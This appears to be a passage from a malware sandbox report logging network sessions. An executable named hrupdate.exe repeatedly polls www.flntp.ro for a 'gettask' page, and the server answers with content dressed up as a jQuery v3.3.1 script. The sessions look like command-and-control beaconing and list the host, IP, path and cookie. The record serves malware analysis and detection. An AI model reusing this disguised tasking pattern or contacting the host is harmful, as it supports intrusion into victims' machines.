                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:12 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:12 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:12 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.4497343.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:14 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:14 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:14 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:14 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.4497353.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:16 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:16 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:16 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:16 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.4497363.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:18 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:19 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:18 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:19 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.4497373.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:20 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:21 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:21 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:21 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.4497393.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:22 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:23 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:23 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:23 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.4497433.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:25 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:25 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:25 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:25 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.4497453.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:27 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:27 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:27 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:27 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.4497473.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:29 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:30 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:29 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:30 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.4497483.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:31 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:32 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:32 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:32 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.4497493.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:40:33 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:40:34 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:40:34 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:40:34 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
